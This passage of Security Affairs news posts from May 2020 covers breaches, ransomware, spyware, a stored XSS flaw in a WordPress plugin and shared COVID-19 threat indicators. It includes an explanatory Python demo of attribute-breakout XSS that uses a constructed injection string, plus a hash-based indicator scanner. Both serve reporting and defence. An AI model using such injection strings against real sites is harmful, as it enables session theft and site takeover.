The airline reported the incident to the Information Commissioner’s Office (“ICO”); the good news is that the company is not aware of any attack in the wild that abused the stolen information.

EasyJet is still investigating the security breach.

“We take the cybersecurity of our systems very seriously and have robust security measures in place to protect our customers’ personal information. However, this is an evolving threat as cyber attackers get ever more sophisticated,” says EasyJet Chief Executive Officer Johan Lundgren.

“Since we became aware of the incident, it has become clear that owing to COVID-19, there is heightened concern about personal data being used for online scams. Every business must continue to stay agile to stay ahead of the threat.”

The airline has started notifying all the impacted customers of the incident and is recommending that they be “extra vigilant, particularly if they receive unsolicited communications.”

According to Reuters, which cited two people familiar with the investigation, the hacking tools and techniques used by the attackers point to a group of suspected Chinese hackers that has targeted multiple airlines in recent months.

Pierluigi Paganini

(SecurityAffairs – EasyJet, hacking)

The post Easyjet hacked: 9 million customer’s data exposed along with 2,200+ credit card details appeared first on Security Affairs.

Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

Spear-phishing is a rapidly emerging threat. It’s more specific than generic phishing attempts and often targets a single person or company. Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers. 

Cybercriminals Capitalizing on the Chaos

The coronavirus is forcing companies in most industries to operate substantially differently. Many may find it takes time to adjust to the changes. Others do not immediately have the resources for a major shift, such as having all employees work remotely. 

A related concern is that COVID-19 is both a new and anxiety-inducing issue. People want to learn as much as they can about it, and their haste may result in them clicking on links without thinking. Cybercriminals view these conditions as ideal for orchestrating their attacks. Data from Barracuda cybersecurity researchers identified a 667% increase in spear-phishing attacks between the end of February and the following month. 

Real-Life Examples of Spear-Phishing Attacks in the Energy Production Sector

The threat of spear-phishing for energy companies is, unfortunately, not a theoretical one. Coverage published in late April by Bitdefender illuminated a carefully executed attack. The research team found evidence of a campaign occurring March 31, whereby hackers impersonated a well-known engineering company with experience in on- and off-shore energy projects. 

The messages — which did not include many of the telltale signs of phishing like spelling and grammatical errors — asked recipients to submit equipment and materials bids for the Rosetta Sharing Facilities Project. Participants would do so on behalf of Burullus, a gas joint venture partially owned by another Egyptian state oil brand. 

The emails also contained two attachments, which were supposedly bid-related forms. Downloading them infected a user’s system with a type of trojan spyware not previously seen in other utilities industry cyberattacks. The effort targeted oil companies all over the world, from Malaysia to South Africa, in a single day. 

Bitdefender’s research team also uncovered a more geographically specific spear-phishing attempt to target the gas sector on April 12. It centered on a relatively small number of shipping companies based in the Philippines. The emails asked them to send details associated with an oil tanker vessel and contained industry-specific language. This spear-phishing campaign occurred over two days. 

The cybersecurity experts that studied these attacks stressed that, since the messages contained accurate details about real-life companies and events associated with the oil industry, the attackers took the time to research to craft maximally convincing content. 

Hackers Love Causing Severe Disruptions

Why are cyberattacks in the energy industry suddenly on the rise? One reason may stem from the way hackers often deploy tactics to cause tremendous harm to necessary services. The oil industry operates on a vast scale. For example, a company specializing in oil and gas exploration planned as much as 300,000 feet of total footage for drilling in one region during 2018. 

The ability to get such impressive outcomes undoubtedly helps oil companies. The increased scale also may make it more necessary to safeguard against cyberattacks, especially as criminals look for ways to cause the most damage. Another recent incident, announced in a United States government alert on February 18, shut down a natural gas compression facility. Operations stopped for two days, causing losses in productivity and revenue. 

Although the publication did not name the energy company, it mentioned that the hackers relied on spear-phishing to obtain the credentials needed to enter the business’s information technology (IT) network. They then used that access to wreak havoc on the enterprise’s operational technology infrastructure. 

Not a New Concern

Utilities industry cyberattacks have long worried cybersecurity analysts. If concentrated efforts from hackers shut down the electric grid, the effects could be long-lasting and hit virtually every industry and consumer in the affected areas. The risks to the energy sector began before the coronavirus pandemic, too. 

In November 2019, cybersecurity publications discussed a ransomware attack on Petróleos Mexicanos, Mexico’s largest oil and gas company. The perpetrators asked for 562 bitcoins to restore the data. The affected enterprise did not comply, and it had important data backed up. 

Toll Group, an Australian transportation and logistics company with oil and gas companies as clients, suffered a ransomware attack this spring. It was the second such issue in four months, with the first happening in February. 

The Energy Industry Must Remain Vigilant

The challenges posed by COVID-19 and its effect on oil prices may make the respective parties feel the impacts of cyberattacks in the energy industry more acutely. An ideal aim is to prevent those events rather than dealing with the damage afterward. Paying attention to cybersecurity vulnerabilities can help companies make meaningful gains and stay protected.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Hackers Target Oil Producers During COVID-19 Slump appeared first on Security Affairs.

129 million records of Russian car owners available on the dark web

A hacker is offering for sale on a dark web forum a database containing 129 million records of car owners in Moscow.

A hacker is attempting to sell on a dark web forum a database containing 129 million records of car owners in Moscow.

As proof of the authenticity of the data, the hacker has leaked a sample of anonymized records containing all the car details present in the traffic police registry.

The sample archive doesn’t include car owners’ details; the exposed data includes the car’s make and model, place of registration, and the dates of first and last registration.

The seller is offering the full database for 0.3 BTC, about $2,677 at the current rate, while 1.5 BTC ($13,386) buys the information for “exclusive use.”

The accuracy of the data has been verified by Vedomosti media.

“Hackers posted a darknet database of Russian car owners, it includes 129 million positions from the traffic police registry. The authenticity of the information was confirmed by an employee of the car-sharing company, Vedomosti reports.” reads the website rbc.ru.

“In the published data there is only anonymized information. These include: place and date of registration of the car, make and model. According to hackers, the full version also contains the name, address, date of birth, passport numbers of car owners and their contact information.”

According to the Russian blog Nora the Hedgehog, several portals where people can pay fines for violating COVID-19 quarantine are leaking their full names and passport numbers by simply providing the registration number of the ticket.

The worst news is that the portals don’t implement any protection against brute-force attacks, allowing attackers to try all the possible combinations of unique ticket numbers to retrieve personal details of the people that paid the fines.

Pierluigi Paganini

(SecurityAffairs – dark web, hacking)

The post 129 million records of Russian car owners available on the dark web appeared first on Security Affairs.

A bug in Edison Mail iOS app impacted over 6,400 users

A security bug in the iOS app has impacted over 6,400 Edison Mail users; the issue allowed some users to access other people’s email accounts.

An update released for the Edison Mail iOS application introduced a security bug that gave some users access to other people’s email accounts.

“On Friday, May 15th, 2020, a software update enabled users to manage accounts across their Apple devices. This update caused a technical malfunction that impacted approximately 6,480 Edison Mail iOS users. The issue only impacted a fraction of our iOS app users (and no Android or Mac users were affected). This temporary issue was a bug, and not related to any external security issues.” reads a post published by the company.

“Data from these individuals’ impacted email accounts may have been exposed to another user. No passwords were compromised.”

The Edison Mail app allows users to manage their Gmail, Yahoo, Outlook, iCloud, and other email services in a single place. The company offers apps for iOS, Android and macOS, and says its products are used by millions of individuals.


The update was rolled out on May 15 and included a feature that allows users to manage their accounts across their Apple devices.

Shortly after the patch was released, some users started reporting they could access other people’s email accounts from the iOS app without authentication.

Edison quickly resolved the issue; the company confirmed that the bug potentially impacted 6,480 iOS users.

Edison Mail also confirmed that user credentials were not exposed.

The company addressed the issue with two updates: the first, on Saturday, prevented impacted users from accessing any account from the Edison app; the second, on Sunday morning, re-enabled access for impacted users.

“A new version of the application was made available early Sunday morning in the App Store that restores full functionality for these 6,480 users. Other users were not impacted and no action is required.” added the company.

“We have notified all individual users who may have been impacted by this issue via email, and as an additional safety precaution, suggested that impacted users also change their email account password. If you did not receive an email on this issue then your account was not impacted.”

Pierluigi Paganini

(SecurityAffairs – Edison Mail, hacking)

The post A bug in Edison Mail iOS app impacted over 6,400 users appeared first on Security Affairs.

Texas Department of Transportation (TxDOT) hit by a ransomware attack

A new ransomware attack hit the Texas government, the malware this time infected systems at the state’s Department of Transportation (TxDOT).

The Texas government suffered two ransomware attacks in a few weeks, the first one took place on May 8, 2020 and infected systems at the Texas court.

Now ransomware has infected systems at the state’s Department of Transportation (TxDOT); the attack forced administrators to shut down the systems to stop the ransomware from spreading.

The state’s Department of Transportation (TxDOT) discovered the second attack on May 14; the infection followed unauthorized access to the Department’s network.

“The Texas Department of Transportation determined that on May 14, 2020, there was unauthorized access to the agency’s network in a ransomware event” states the TxDOT.

The agency immediately took steps to prevent further damage and isolated the impacted systems, and it is “working to ensure critical operations continue during this interruption.”

The agency reported the incident to local authorities and is investigating it with the help of the FBI.

At the time of writing it is not clear whether the two attacks are connected; no technical details are available for either incident, nor is it known whether the attackers stole any data.

In August 2019, Texas was hit by a wave of ransomware attacks that targeted local governments.

At least 23 local government organizations were impacted by those ransomware attacks; the Department of Information Resources (DIR) is investigating them and providing support to mitigate the attacks.

Pierluigi Paganini

(SecurityAffairs – TxDOT, hacking)

The post Texas Department of Transportation (TxDOT) hit by a ransomware attack appeared first on Security Affairs.

Mandrake, a highly sophisticated Android spyware used in targeted attacks

Security experts discovered a highly sophisticated Android spyware platform, dubbed Mandrake, that remained undetected for four years.

Researchers from Bitdefender discovered a highly sophisticated Android spyware platform dubbed Mandrake that was involved in highly targeted attacks against specific devices. Mandrake is an advanced cyberespionage platform, but experts believe the attacks are financially motivated.

The threat actors behind this campaign managed to fly under the radar for as long as possible. They carefully selected the devices to infect, compromising only devices in countries that were of interest to them.

“Mandrake stood in the shadow for at least 4 years. During this time, it stole data from at least tens of thousands of users.” reads the report published by Bitdefender. “It takes special care not to infect everyone” – This is exactly what the actor did and most likely why it remained under the radar for 4 full years. Because of this strategy, the actual number of infections we were able to trace is quite low; Google Play Apps used as droppers to infect targets have only hundreds or – in some cases – thousands of downloads. It might even be possible that some of the infected users won’t face an attack at all if they present no interest to the actor.”

Most of the infections are in Australia, followed by Europe, America, and Canada. Experts observed two different waves of attacks, the first in 2016 and 2017.

Experts detected seven malicious applications delivering Mandrake in Google Play alone, namely Abfix, CoinCast, SnapTune Vid, Currency XE Converter, Office Scanner, Horoskope, and Car News.


Sinkholing performed by the experts revealed about 1,000 victims during a 3-week period. The researchers estimated that tens of thousands, and probably hundreds of thousands, of users were infected over the last 4 years.

During the past four years the platform has received numerous updates, with its operators constantly adding new features.

Mandrake allows attackers to gain complete control over an infected device and exfiltrate sensitive data. It also implements a kill-switch feature (a special command called seppuku, after the Japanese form of ritual suicide) that wipes all of the victim’s data and leaves no trace of the malware.

“The attacker has access to data such as device preferences, address book and messages, screen recording, device usage and inactivity times, and can obviously paint a pretty accurate picture of the victim, and their whereabouts.” continues the report. “The malware has complete control of the device: it can turn down the volume of the phone and block calls or messages, steal credentials, exfiltrate information, to money transfers and blackmailing. It can conduct phishing attacks, by loading a webpage and injecting a specially crafted JavaScript code to retrieve all data from input forms.”

The list of targets is long and includes an Australian investment trading app, crypto-wallet apps, the Amazon shopping application, Gmail, banking software, payment apps, and an Australian pension fund app.

The malware evades detection by delaying its activities and operating in three stages: dropper, loader, and core.

The dropper consists of the apps published on Google Play; it is not possible to determine when the loader and the core are delivered.

The malware implements evasion techniques such as anti-emulation and leverages administrator privileges and the Accessibility Service to achieve persistence.

The report contains technical details about the threat, including Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Mandrake, hacking)

The post Mandrake, a highly sophisticated Android spyware used in targeted attacks appeared first on Security Affairs.

FBI warns US organizations of ProLock ransomware decryptor not working

The FBI issued a flash alert to warn organizations in the United States that the ProLock ransomware decryptor doesn’t work properly.

Early this month, the FBI issued a flash alert to warn organizations of the new threat actor targeting healthcare, government, financial, and retail industries in the US.

“The decryption key or ‘decryptor’ provided by the attackers upon paying the ransom has not routinely executed correctly,” states the alert.

“The decryptor can potentially corrupt files that are larger than 64MB and may result in file integrity loss of approximately 1 byte per 1KB over 100MB.”

Threat actors are attempting to take advantage of the ongoing Coronavirus pandemic and are using COVID-19 lures in their attacks.

Experts have reported several ransomware attacks against businesses and organizations; the ProLock ransomware is just one more threat on the list.

The FBI recommends that ransomware victims avoid paying the ransom to decrypt their files. Feds warned that the ProLock decryptor does not work correctly and that using it could permanently destroy data: the decryptor can corrupt files larger than 64MB during the decryption process.

The PwndLocker ransomware was first spotted by security researchers in late 2019; its operators’ demands have ranged from $175,000 to more than $660,000 worth of Bitcoin.

According to the FBI, operators behind the threat gain access to hacked networks via the Qakbot (Qbot) trojan, but experts from Group-IB added that they also target unprotected Remote Desktop Protocol (RDP)-servers with weak credentials. It is still unclear if the ProLock ransomware was managed by the Qakbot gang, or if the ProLock operators pay to gain access to hosts infected with Qakbot to deliver their malware.

“ProLock operators used two main vectors of initial access: QakBot (Qbot) and unprotected Remote Desktop Protocol (RDP)-servers with weak credentials.” reads the report published by Group-IB.

“The latter is a fairly common technique among ransomware operators. This kind of access is usually bought from a third party but may be obtained by group members as well.”

In March, threat actors behind PwndLocker changed the name of their malware to ProLock, immediately after security firm Emsisoft released a free decryptor tool.

According to the popular investigator Brian Krebs, the systems at Diebold Nixdorf were recently infected by the ProLock ransomware (aka PwndLocker), the same piece of ransomware involved in the attack against Lasalle County, Ill. in March.

“Fabian Wosar, Emsisoft’s chief technology officer, said if Diebold’s claims about not paying their assailants are true, it’s probably for the best: That’s because current versions of ProLock’s decryptor tool will corrupt larger files such as database files.” reads the analysis published by Krebs.

“As luck would have it, Emsisoft does offer a tool that fixes the decryptor so that it properly recovers files held hostage by ProLock, but it only works for victims who have already paid a ransom to the crooks behind ProLock.

“We do have a tool that fixes a bug in the decryptor, but it doesn’t work unless you have the decryption keys from the ransomware authors,” Wosar said.”

Pierluigi Paganini

(SecurityAffairs – ProLock, hacking)

The post FBI warns US organizations of ProLock ransomware decryptor not working appeared first on Security Affairs.

Stored XSS in WP Product Review Lite plugin allows for automated takeovers

A critical flaw in the WP Product Review Lite plugin, installed on over 40,000 WordPress sites, could potentially allow their takeover.

Attackers could exploit a critical vulnerability in the WP Product Review Lite WordPress plugin to inject malicious code and potentially take over vulnerable websites.

The WP Product Review Lite plugin allows site owners to quickly create custom review articles using pre-defined templates, it is currently installed on over 40,000 WordPress sites.

The vulnerability was discovered by researchers at Sucuri Labs, it is a persistent XSS that could be exploited by remote, unauthenticated attackers.

“During a routine research audit for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 40,000+ users of the WP Product Review plugin.” reads the analysis published by Sucuri.

“All user input data is sanitized but the WordPress function used can be bypassed when the parameter is set inside an HTML attribute. A successful attack results in malicious scripts being injected in all the site’s products.”

Attackers can bypass the WordPress user input data sanitization function to exploit the Stored Cross-Site Scripting (Stored XSS) issue. Upon triggering the flaw, the attackers could inject malicious scripts in all the products stored in the database of the targeted website.
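As an added illustration (not the plugin’s own code; the tag-stripping sanitizer and the markup template are assumptions standing in for the unnamed WordPress function), the snippet below shows why a sanitizer that only removes tags is insufficient once the value lands inside an HTML attribute, and how attribute-context escaping, the role played by WordPress’s esc_attr(), keeps the value confined. The breakout check is the kind of assertion an audit of a review template could run.

```python
import html
import re
from html.parser import HTMLParser

# Added illustration, not the plugin's code. A tag-stripping sanitizer stands in for the
# unnamed WordPress sanitization function that Sucuri says "can be bypassed when the
# parameter is set inside an HTML attribute"; the markup template is invented.
TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(value: str) -> str:
    """Text-node sanitizer: drops anything shaped like a tag, leaves quotes alone."""
    return TAG_RE.sub("", value)


def render_vulnerable(label: str) -> str:
    """Sanitized value interpolated into an attribute. Because the sanitizer never
    touches double quotes, the value can terminate the attribute and add another."""
    return '<div class="wppr-review" data-label="%s"></div>' % strip_tags(label)


def render_fixed(label: str) -> str:
    """Same template with attribute-context escaping (what WordPress's esc_attr() does):
    quotes, angle brackets and ampersands become entities, so the value stays inside
    the attribute no matter what it contains."""
    return '<div class="wppr-review" data-label="%s"></div>' % html.escape(
        strip_tags(label), quote=True
    )


class _FirstDiv(HTMLParser):
    """Collects the attributes a browser would see on the first <div>."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}
        self._done = False

    def handle_starttag(self, tag, attrs):
        if tag == "div" and not self._done:
            self.attrs = dict(attrs)  # attribute values arrive entity-decoded
            self._done = True


def parsed_attributes(markup: str) -> dict:
    parser = _FirstDiv()
    parser.feed(markup)
    return parser.attrs


# The attributes the template declares; anything else came from user input.
EXPECTED_ATTRS = {"class", "data-label"}


def attribute_breakout(markup: str) -> bool:
    """Audit check: True when the rendered element carries attributes the template
    never declared, i.e. user input escaped the attribute it was placed in."""
    return set(parsed_attributes(markup)) != EXPECTED_ATTRS


# Constructed input: no tags for the sanitizer to catch, but a quote that ends the
# attribute followed by a second attribute name. A malicious review would carry a
# script-bearing attribute there; an inert marker is used so only the breakout is checked.
CONSTRUCTED_INPUT = 'Great product" data-injected="1'

if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        out = render(CONSTRUCTED_INPUT)
        print(f"{name}: {out}")
        print(f"  breakout={attribute_breakout(out)} attrs={parsed_attributes(out)}")
```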

An attacker could trick a site admin into viewing the compromised products, then redirect them to a rogue site or steal their session cookies to authenticate on behalf of the administrator.

Once authenticated as an admin, the attacker could add a new admin account to take over the site.

Researchers at the Sucuri Labs revealed that they are not aware of any attacks in the wild exploiting the flaw.

Experts recommend that site administrators update the plugin to version 3.7.6 as soon as possible, because unauthenticated attacks can be automated.

“Unauthenticated attacks are very serious because they can be automated, making it easy for hackers to mount successful, widespread attacks against vulnerable websites,” Sucuri Labs conclude.

“The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.”

The vulnerability was reported to the plugin developers on May 13, and it was fixed in only 24 hours, on May 14, 2020.

At the time of writing, more than 7,000 users have already updated their WP Product Review Lite plugin; this means that more than 32,000 sites have yet to do so.

Pierluigi Paganini

(SecurityAffairs – WP Product Review Lite, hacking)

The post Stored XSS in WP Product Review Lite plugin allows for automated takeovers appeared first on Security Affairs.

Coronavirus-themed attacks May 10 – May 16, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 10 to May 16, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide; experts are observing new campaigns on a daily basis.

Below is a list of attacks detected this week.

May 12 – Zeus Sphinx continues to be used in COVID-19-themed attacks

The Zeus Sphinx banking Trojan continues to evolve, receiving new updates while it is employed in ongoing coronavirus-themed scams.

May 13 – Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

May 14 – China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

May 16 – Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

May 16 – QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in a COVID-19-themed phishing campaign in which crooks promise victims COVID-19 tax relief.

If you are interested in COVID-19-themed attacks from February 1 onward, take a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 10 – May 16, 2020 appeared first on Security Affairs.

Security Affairs newsletter Round 264

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Blue Mockingbird Monero-Mining campaign targets web apps
Shiny Hunters group is selling data from 11 companies on the Dark Web
Swiss rail vehicle manufacturer Stadler hit by a malware-based attack
ATM vendor Diebold Nixdorf suffered a Ransomware attack
Experts disclose security flaws in Oracle’s iPlanet Web Server
GDPR Data Security Checklist in the Age of COVID-19 and the Remote Workforce
Sodinokibi ransomware uses MS API to encrypt open and locked files
STAMINA, a new approach to malware detection by Microsoft, Intel
VMware is going to fix recent Salt issues in vROps
A cyber attack hit a port on Strait of Hormuz, Iran said
Adobe addresses critical issues in Acrobat, Reader, and DNG SDK
Patch now your vBulletin install before hacker will target your forum
Popular Page Builder WordPress plugin fixes critical issues. Update it now!
Trojan Lampion is back after 3 months
Zeus Sphinx continues to be used in Coronavirus-themed attacks
Chancellor Merkel has ‘hard evidence’ that Russian hackers targeted her
Crooks continues to use COVID-19 lures, Microsoft warns
Expert found 1,236 websites infected with Magecart e-skimmer
Healthcare giant Magellan Health discloses data breach after ransomware attack
Microsoft May 2020 Patch Tuesday fixes 111 flaws, 13 Critical
USCYBERCOM shares five new North Korea-linked malware samples
China-linked hackers are attempting to steal COVID-19 Vaccine Research
Crooks stole $10 million from Norway’s state investment fund Norfund
Google WordPress Site Kit plugin grants attacker Search Console Access
New Ramsay malware allows exfiltrating files from air-gapped computers
Zerodium will no longer acquire certain types of iOS exploits due to surplus
Chinese APT Tropic Trooper target air-gapped military Networks in Asia
Interserve UK defense contractor hacked, up to 100,000 past and present employees details exposed
Palo Alto Networks addresses tens of serious issues in PAN-OS
Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands
Threat actors are offering for sale 550 million stolen user records
APT group targets high profile networks in Central Asia
Microsoft is open-sourcing COVID-19 threat intelligence
QNodeService Trojan spreads via fake COVID-19 tax relief

Pierluigi Paganini

(SecurityAffairs – newsletter, hacking)

The post Security Affairs newsletter Round 264 appeared first on Security Affairs.

Elexon, a middleman in the UK power grid network hit by cyber-attack

Elexon, a middleman in the UK power grid network, recently reported it was hit by a cyber attack.

Elexon, a middleman in the UK power grid network, was the victim of a cyber attack; the incident only affected the internal IT network, including the company’s email server and employee laptops.

“Hackers have targeted a critical part of the UK’s power network, locking staff out of its systems and leaving them unable to send or receive emails.” reads a post published by The Telegraph.

“Elexon – a key player in the energy market between power station operators and firms that supply households and businesses – said in a statement that its internal systems and company laptops had been affected by the cyberattack. It declined to give further details.”

The company manages electricity supply and demand and distributes the power around the network according to the demand.

“We are advising you that today that ELEXON’s internal IT systems have been impacted by a cyber attack. BSC Central Systems and EMR are currently unaffected and working as normal. The attack is to our internal IT systems and ELEXON’s laptops only.” reads a post published by the company on its website. “We are currently working hard to resolve this. However please be aware that at the moment we are unable to send or receive any emails.”

The company has taken down the email server in response to the attack.

According to Elexon, the systems used to manage the UK’s electricity transit were not impacted.

The company published a second message to announce that it had discovered the root cause of the incident and was working to restore the internal network and employee laptops. Elexon also added that the BSC Central Systems (and their data) and EMR were not impacted and continue to work as normal.

Even though the company did not reveal any details about the attack, experts speculate that ransomware was involved.

Experts from security firm Bad Packets reported that Elexon had been running an outdated version of the Pulse Secure VPN server; if confirmed, threat actors could have exploited it to access the internal network.

In January, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) warned organizations that attackers continue to exploit the well known Pulse Secure VPN vulnerability tracked as CVE-2019-11510.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability that can be easily exploited using publicly available proof-of-concept code. The flaw can be chained with the CVE-2019-11539 remote command injection issue to gain access to private VPN networks.

In October, the UK’s National Cyber Security Centre (NCSC) reported that advanced persistent threat (APT) groups have been exploiting recently disclosed vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure products to break into target networks.

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379.

The NSA also warned of multiple state-sponsored cyberespionage groups exploiting enterprise VPN flaws.

Although Pulse Secure addressed the flaw in April, thousands of Pulse Secure VPN endpoints are yet to be patched. In January 2020, Bad Packets reported that there were still 3,623 vulnerable Pulse Secure VPN servers, 1,233 of which were in the United States. The security firm confirmed that Elexon was still running an outdated Pulse Secure VPN installation.

The UK’s National Grid agency publicly announced that the incident did not affect electricity supply across the nation.

Pierluigi Paganini

(SecurityAffairs – Elexon, hacking)

The post Elexon, a middleman in the UK power grid network hit by cyber-attack appeared first on Security Affairs.

APT group targets high profile networks in Central Asia

Security firms have foiled an advanced cyber espionage campaign carried out by a Chinese APT and aimed at infiltrating a governmental institution and two companies.

Antivirus firms have uncovered and foiled an advanced cyber espionage campaign aimed at a governmental institution and two companies in the telecommunications and gas sector.

The level of sophistication of the attack and the nature of the targets suggest the involvement of an advanced persistent threat, likely from China, focused on cyber espionage activity in Central Asia.

Attackers used multiple commodity malware families and previously unknown backdoors in the attacks; the analysis of their code suggests a possible link with multiple campaigns uncovered over several years.

Most of the C2 servers used by the attackers are hosted by the provider Choopa, LLC, and the threat actors made extensive use of Gh0st RAT, a malware attributed to China-linked cyber espionage groups.

The security firms ESET and Avast first detected the attacks in September and January, respectively. The researchers identified a host used as a repository containing hacking tools and backdoors whose code has many similarities with malware previously associated with China-linked APT groups.

“The samples we analyzed contain links to malware samples and campaigns, such as Microcin, BYEBY, and Vicious Panda, previously described by Kaspersky, Palo Alto Networks, and Check Point, respectively. The backdoors we found are custom tools that have not previously been analyzed, as far as we know.” reads a report published by Avast. “The majority of the C&C servers are registered to Choopa, LLC, a hosting platform that has been used by cybercriminals in the past.”

Below is a timeline of the attacks that appear to be associated with the same threat actor.

[Figure: Avast APT timeline, May 2020]

“An APT group, which we believe could possibly be from China, planted backdoors to gain long-term access to corporate networks. Based on our analysis, we suspect the group was also behind attacks active in Mongolia, Russia, and Belarus.” continues Avast.

Researchers from ESET who investigated the attacks discovered three backdoors, collectively tracked as Mikroceen. The backdoors allowed the threat actors to manage the target file system, establish a remote shell, take screenshots, manage services and processes, and run console commands.

Below is the list of backdoors published by ESET:

  • sqllauncher.dll (VMProtected backdoor)
  • logon.dll (VMProtected backdoor)
  • logsupport.dll (VMProtected backdoor)

Experts noticed that all three backdoors feature protection against reverse engineering. Two of them, “sqllauncher.dll” and “logon.dll,” run as services and use the same C2 server.

Attackers use a version of the Mimikatz post-exploitation tool and rely on Windows Management Instrumentation (WMI) for lateral movement.

“Avast reported its findings to the local CERT team and reached out to the telecommunications company. We have not heard back from either organization.” concluded Avast.

“Avast has recently protected users in Central Asia from further attacks using the samples we analyzed.”

Both Avast and ESET have published a list of indicators of compromise (IoC) for the above threats.

Pierluigi Paganini

(SecurityAffairs – Microcin malware, hacking)

The post APT group targets high profile networks in Central Asia appeared first on Security Affairs.

Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

As the number of Coronavirus-themed attacks continues to increase, Microsoft announced it is open-sourcing its COVID-19 threat intelligence to help organizations repel these threats.

“Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack.” reads a post published by Microsoft. “Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions.”

Sharing information could offer the community a more complete view of attackers’ tactics, techniques, and procedures.

Microsoft experts have already been sharing examples of malicious lures and have provided guided hunting of COVID-themed attacks through Azure Sentinel Notebooks.

[Image: COVID-19 malspam sample]

Microsoft is going to publicly release some of its threat indicators; the company pointed out that its users are already protected against these attacks by Microsoft Threat Protection (MTP).

Microsoft has made available the indicators both in the Azure Sentinel GitHub repo, and through the Microsoft Graph Security API.

“These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.” continues Microsoft.

“This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.”

This is just the beginning of the threat intelligence sharing of Coronavirus-related IOCs that will be offered through the peak of the outbreak.

Microsoft is releasing file hash indicators related to malicious email attachments employed in the campaigns. 

Azure Sentinel customers can import the indicators using a Playbook or access them directly from queries. Microsoft added that both Office 365 ATP and Microsoft Defender ATP already block the attacks associated with the above indicators.
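As an added illustration of how such file-hash indicators are consumed (this is example code written for this post, not Microsoft’s tooling or the Azure Sentinel playbook), the Python script below loads a constructed CSV feed, drops malformed rows so they can never silently match, and scans a directory for files whose SHA-256 appears in the feed. The column names, the sample attachment bytes and the file names are assumptions for the example; the real Azure Sentinel and MISP feeds carry their own schemas.

```python
import csv
import hashlib
import io
import os
import tempfile

# Constructed stand-in for a known-bad attachment (it is just text, not malware).
BAD_ATTACHMENT = b"constructed sample standing in for a malicious attachment"
BAD_SHA256 = hashlib.sha256(BAD_ATTACHMENT).hexdigest()

# Constructed feed. The column names are an assumption for this example; the
# real Azure Sentinel and MISP feeds carry their own schemas.
SAMPLE_FEED = (
    "indicator_type,indicator_value,description\n"
    f"FileHash-SHA256,{BAD_SHA256},constructed COVID-19 lure attachment\n"
    "FileHash-SHA256,not-a-hash,malformed row that must be skipped\n"
    "DomainName,lure.example,non-hash indicator type ignored by this scanner\n"
)

HEX = set("0123456789abcdef")


def load_indicators(feed_text):
    """Parse the CSV into {sha256_lowercase: description}, dropping bad rows."""
    indicators = {}
    for row in csv.DictReader(io.StringIO(feed_text)):
        if (row.get("indicator_type") or "").lower() != "filehash-sha256":
            continue
        value = (row.get("indicator_value") or "").strip().lower()
        if len(value) != 64 or not set(value) <= HEX:
            continue  # never let a malformed value into the match set
        indicators[value] = row.get("description", "")
    return indicators


def sha256_of_file(path):
    """Stream the file so large attachments do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_directory(root, indicators):
    """Hash every regular file under root; return [(path, description)] hits."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path):
                continue
            digest = sha256_of_file(path)
            if digest in indicators:
                hits.append((path, indicators[digest]))
    return hits


def demo():
    """Write one matching and one benign file to a temp dir and scan it."""
    indicators = load_indicators(SAMPLE_FEED)
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "relief_form.pdf"), "wb") as f:
            f.write(BAD_ATTACHMENT)
        with open(os.path.join(tmp, "notes.txt"), "wb") as f:
            f.write(b"benign content")
        return [(os.path.basename(p), d) for p, d in scan_directory(tmp, indicators)]


if __name__ == "__main__":
    print(demo())
```

Validating each indicator before it enters the match set matters more than it looks: a feed row with an empty or truncated hash would otherwise match nothing or, worse, match the wrong thing if the comparison were ever relaxed to prefixes.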

Pierluigi Paganini

